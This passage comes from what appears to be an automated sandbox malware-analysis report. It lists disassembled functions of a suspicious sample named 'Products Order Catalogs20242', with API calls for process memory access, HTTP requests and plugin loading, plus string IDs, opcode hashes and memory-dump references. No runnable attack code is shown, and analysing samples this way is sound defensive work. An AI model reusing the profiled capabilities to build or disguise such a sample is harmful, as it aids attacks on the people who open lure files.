                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 1537469427-0
                                                                                                • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc
                                                                                                • String ID: Default$|k
                                                                                                • API String ID: 1579825452-2254895183
                                                                                                • Opcode ID: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                • Opcode Fuzzy Hash: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: '$[$h
                                                                                                • API String ID: 2931989736-1224472061
                                                                                                • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: >$R$U
                                                                                                • API String ID: 909875538-1924298640
                                                                                                • Opcode ID: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                • Opcode Fuzzy Hash: 83caccdc30ebaedd60eda3635d3ed4fa95617b34971efb7504fa10d53abc7e5a
                                                                                                • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                APIs
                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 886957087-24824748
                                                                                                • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                Strings
                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen
                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                • API String ID: 176396367-557222456
                                                                                                • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                APIs
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearCopyInit_malloc
                                                                                                • String ID: 4RH
                                                                                                • API String ID: 2981388473-749298218
                                                                                                • Opcode ID: c26f7a3086022908b18cdef591f48b83bab91b2854b3ff3a8353accd24870fc8
                                                                                                • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                • Opcode Fuzzy Hash: c26f7a3086022908b18cdef591f48b83bab91b2854b3ff3a8353accd24870fc8
                                                                                                • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                APIs
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                • String ID: LPT$HH
                                                                                                • API String ID: 3035604524-2728063697
                                                                                                • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                APIs
                                                                                                  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                • String ID: @
                                                                                                • API String ID: 4055202900-2766056989
                                                                                                • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CrackInternet_memset_wcslen
                                                                                                • String ID: |
                                                                                                • API String ID: 915713708-2343686810
                                                                                                • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                APIs
                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                • String ID:
                                                                                                • API String ID: 3705125965-3916222277
                                                                                                • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: SysTreeView32
                                                                                                • API String ID: 847901565-1698111956
                                                                                                • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                • API String ID: 145871493-4132174516
                                                                                                • Opcode ID: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                • Opcode Fuzzy Hash: 4d29db7c409dc1d8665f13fcd2a771d904d38d92e5d57695c8085be3ce6f429e
                                                                                                • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow
                                                                                                • String ID: msctls_updown32
                                                                                                • API String ID: 3375834691-2298589950
                                                                                                • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                • String ID: Listbox
                                                                                                • API String ID: 3315199576-2633736733
                                                                                                • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                • String ID: HH
                                                                                                • API String ID: 2507767853-2761332787
                                                                                                • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
